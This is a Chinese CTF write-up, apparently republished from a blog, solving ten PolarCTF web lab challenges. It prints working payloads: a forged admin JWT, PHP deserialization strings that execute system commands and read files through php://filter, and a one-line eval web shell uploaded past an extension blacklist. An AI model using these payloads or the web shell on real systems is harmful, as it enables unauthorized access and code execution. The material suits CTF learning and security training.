首页 星云 工具 资源 星选 资讯 热门工具
:

PDF转图片 完全免费 小红书视频下载 无水印 抖音视频下载 无水印 数字星空

Web刷题之polarctf靶场(2)

编程知识
2024年09月22日 20:56

1.蜜雪冰城吉警店

点开靶场, 发现题目说点到隐藏奶茶(也就是第九杯)就给flag, 但是明显就只有八杯, 猜测大概率考的是前端代码修改

image

把id=1修改为id=9, 然后回到页面点击原味奶茶即可弹出flag

image

#flag{7d43cc8863ad0ee649048e562fde53ec}

2.召唤神龙

打开靶场发现是一个游戏, 爽玩了几把发现通关有难度啊

image

直接F12查看界面源码, 在main.js文件中发现一串文字, 猜测是jsfuck(源于brainfuck)

image

上工具, 解密得到flag
#flag{fdf9a88ec4fdd9e3dedaafeece5cc248}

image

3.seek flag

打开靶场按F12, 发现给出flag的提示, 我们用工具dirsearch扫描一下, 发现存在robots.txt文件

image
image

访问即可得到第三段flag3:c0ad71dadd11}

image

再通过BurpSuite抓包发包试试看能不能得到什么回显, 发现可以得到第二段flag2:3ca8737a70f029d

image

我们注意到在返回包中有个Set-Cookie, 我们尝试将id改为1发包, 得到flag1:flag{7ac5b

image

拼接三段flag得到最终结果:flag{7ac5b3ca8737a70f029dc0ad71dadd11}

4.jwt

打开靶场, 发现一个登录和注册, 猜测考察垂直越权, 通过普通用户提权到admin用户

image

用自己注册的用户名登录后按F12, 由于题目是jwt, 我们找出jwt的值, 然后用工具对其进行爆破得到密钥:SYSA

对JWT进行一个解释:
JWT(json web token),令牌以紧凑的形式由三部分组成,这些部分由点(.)分隔。

image

再通过在线网站:https://jwt.io/, 对所得到的jwt值进行解码(如若是线下赛, 可以以.来分割, 每段都用base64解码即可)
其次通过修改用户名为admin, 加入密钥, 得到新的jwt的值:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.9avq5ApZ-XZul2kbon8z2cB6Y4bNru_0nnIZfJ1mO50

image

修改网页的jwt值为新的jwt值, 然后重新访问网页即可

image

这样子我们就越权成功, 点开个人中心即可拿到flag

image

#flag{ec39c705cfb5295f9dddcedc819a1659}

5.签到

打开靶场, 发现提交的按钮点不了

image

果然打开BurpSuite进行抓包, 先通过发包看返回包, 发现需要用POST请求, 且参数值为key, 第一次尝试key=flag

image
image

再根据提示, 对参数值进行修改即可得到flag

image

#flag{fa3f77dd58a0a8f990bb6292da75618f}

6.session文件包含

打开靶场, 用BurpSuite进行抓包, 发现返回包中有Set-Cookie参数, 再根据题目描述, 猜测存在伪协议

image

将得到的base64密文, 放到厨子上解密

image

这里我们猜测session文件在/tmp目录下, 文件格式为sess_+sessionid, 这边sessionid在返回包中有

image

通过cat或者tac读取flag

image

#flag{43306e8113f53ece238c0a124432ce19}

7.Don't touch me

打开靶场, 按F12, 找到提示

image

接着直接F12大法, 跟着它的提示一步步走

image

访问fla.php即可

image

#flag{0cee5a97f12b172ceeea2e9f67b7413e}

8.php very nice

本题考察基础的反序列化

image

<?php
class Example
 {
     public $sys="system('ls');";
 }
$a = new Example();
echo serialize($a);
?>

#先将所有文件回显出来, O:7:"Example":1:{s:3:"sys";s:13:"system('ls');";}

image

发现存在flag.php, 因为它会直接执行, 我们用include+伪协议来读取
<?php
class Example
 {
     public $sys="include('php://filter/read=convert.base64-encode/resource=flag.php');";
 }
$a = new Example();
echo serialize($a);
?>

#O:7:"Example":1:{s:3:"sys";s:69:"include('php://filter/read=convert.base64-encode/resource=flag.php');";}

image

base64解密即可
#flag{202cb962ac59075b964b07152d234b70}

参考网上一把梭哈的做法

<?php
class Example
 {
     public $sys="system('tac f*');";
 }
$a = new Example();
echo serialize($a);
?>
#O:7:"Example":1:{s:3:"sys";s:17:"system('tac f*');";}

image

#flag{202cb962ac59075b964b07152d234b70}

9.cookie欺骗

抓包, 修改Cookie的值为admin即可

image

#flag{10e35c76602b330149ef009e0b484d8f}

10.upload

打开靶场, 发现要上传一句话木马, 发现有code里面应该藏着黑名单

image

代码审计后发现, 可以尝试双写文件后缀名尝试绕过

image

一句话木马
<?php @eval($_POST['aaa']);?>

image

再通过中国蚁剑进行连接即可

image

#flag{a89f40341f4271659154829a2215f428}
From:https://www.cnblogs.com/tlomlyiyi/p/18399188
本文地址: http://www.shuzixingkong.net/article/2210
0评论
提交 加载更多评论
其他文章 小美的数组合并(美团20240427年暑期实习笔试真题)
题目:小美的数组合并 小美拿到了一个数组,她每次操作可以将两个相邻元素ai合并为一个元素,合并后的元素为原来两个元素之和。小美希望最终数组的最小值不小于k。她想知道有多少种不同的合并结果? 输入描述 第一行输入两个正整数n,k,代表数组大小和数组的最大值。 第二行输入个正整数ai,代表小美拿到的数组
ConcurrentLinkedQueue详解(图文并茂)
前言 ConcurrentLinkedQueue是基于链接节点的无界线程安全队列。此队列按照FIFO(先进先出)原则对元素进行排序。队列的头部是队列中存在时间最长的元素,而队列的尾部则是最近添加的元素。新的元素总是被插入到队列的尾部,而队列的获取操作(例如poll或peek)则是从队列头部开始。 与
ConcurrentLinkedQueue详解(图文并茂) ConcurrentLinkedQueue详解(图文并茂) ConcurrentLinkedQueue详解(图文并茂)
数据结构与算法之间有何关系?
数据结构与算法是计算机科学中的两个重要概念,程序=算法+数据结构。数据结构管理数据,算法解决问题,两者相辅相成。数据类型是连接两者的桥梁,数据结构与算法既紧密相连又各有关注。
数据结构与算法之间有何关系? 数据结构与算法之间有何关系? 数据结构与算法之间有何关系?
Blazor开发框架Known-V2.0.11
Known今天发布了V2.0.11版本,本次版本添加了系统WebApi在线测试,系统菜单样式配置,表格支持用户设置栏位显隐和顺序,系统上下文支持静态组件与后端交互,以及对PgSQL进行了详细的测试,修复了一些BUG,网站支持微信扫码注册登录,文档和交流互动板块也更新了一部分。Known框架的功能和文
Blazor开发框架Known-V2.0.11 Blazor开发框架Known-V2.0.11 Blazor开发框架Known-V2.0.11
控制请求并发数量:p-limit 源码解读
p-limit 是一个控制请求并发数量的库,他的整体代码不多,思路挺好的,很有学习价值; 举例 当我们同时发起多个请求时,一般是这样做的 Promise.all([ requestFn1, requestFn2, requestFn3 ]).then(res =&gt;{}) 或者 requestF
控制请求并发数量:p-limit 源码解读 控制请求并发数量:p-limit 源码解读 控制请求并发数量:p-limit 源码解读
手搓大模型Task01:LLama3模型讲解
前言 主要进行Qwen模型架构进行讲解。 1.Qwen整体介绍 Qwen的整体架构与Llama2类似,如下图所示: tokenizer将文本转为词表里面的数值。 数值经过embedding得到一一对应的向量。 attention_mask是用来看见左边、右边,双向等等来设定。 各类下游任务,Casu
手搓大模型Task01:LLama3模型讲解
基础数据结构之数组
数组 1) 概述 定义 在计算机科学中,数组是由一组元素(值或变量)组成的数据结构,每个元素有至少一个索引或键来标识 In computer science, an array is a data structure consisting of a collection of elements (v
基础数据结构之数组 基础数据结构之数组 基础数据结构之数组
C#/.NET/.NET Core技术前沿周刊 | 第 6 期(2024年9.16-9.22)
前言 C#/.NET/.NET Core技术前沿周刊,你的每周技术指南针!记录、追踪C#/.NET/.NET Core领域、生态的每周最新、最实用、最有价值的技术文章、社区动态、优质项目和学习资源等。让你时刻站在技术前沿,助力技术成长与视野拓宽。 欢迎投稿,推荐或自荐优质文章/项目/学习资源等。每周
C#/.NET/.NET Core技术前沿周刊 | 第 6 期(2024年9.16-9.22) C#/.NET/.NET Core技术前沿周刊 | 第 6 期(2024年9.16-9.22) C#/.NET/.NET Core技术前沿周刊 | 第 6 期(2024年9.16-9.22)